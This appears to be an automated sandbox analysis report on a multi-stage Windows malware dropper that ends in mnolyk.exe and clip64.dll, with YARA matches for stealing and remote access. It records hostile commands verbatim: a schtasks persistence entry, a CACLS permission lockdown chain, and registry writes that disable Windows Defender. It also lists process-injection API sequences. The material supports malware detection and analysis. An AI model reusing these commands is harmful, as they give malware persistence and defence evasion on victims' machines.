                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe TID: 3960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 1552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5156Thread sleep count: 77 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5156Thread sleep time: -2310000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4056Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4196Thread sleep count: 41 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 2856Thread sleep count: 45 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 2856Thread sleep time: -8100000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5156Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3840Thread sleep count: 167 > 30
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3840Thread sleep time: -167000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-13902
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2450
                              Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2451
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.1 %
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A35467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00A35467
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A32390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A32390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F82390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010BFC58 FindFirstFileExW,14_2_010BFC58
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A3202A
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010BA9A1 mov eax, dword ptr fs:[00000030h]14_2_010BA9A1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010BCFB2 mov eax, dword ptr fs:[00000030h]14_2_010BCFB2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A36F40 SetUnhandledExceptionFilter,0_2_00A36F40
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A36CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A36CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F86F40 SetUnhandledExceptionFilter,1_2_00F86F40
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F86CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00F86CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010B790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_010B790F
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010BBB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_010BBB20
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010B7208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_010B7208

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010A3740 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,14_2_010A3740
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A318A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00A318A3
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: GetLocaleInfoA,2_2_00417A20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010B7AFC cpuid 14_2_010B7AFC
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A37155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00A37155
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010C3C76 _free,_free,_free,GetTimeZoneInformation,_free,14_2_010C3C76
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_020296A8 GetUserNameA,2_2_020296A8
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A32BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00A32BFB

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 2.2.arJf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.arJf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.3.arJf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.arJf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 28.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 26.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 31.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.file.exe.4a09a20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 33.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 33.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.xriv.exe.10a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.file.exe.4a09a20.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.xriv.exe.10a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 26.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 31.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.412655905.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000000.401919368.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000021.00000002.667787109.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.774984109.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.394346269.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000000.412434202.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000000.538870814.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.539099474.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.404038192.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000000.395382320.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000021.00000000.667491618.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 2728, type: MEMORYSTR
                              Source: Yara matchFile source: 27.2.rundll32.exe.6fb90000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 2.2.arJf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.arJf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.3.arJf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
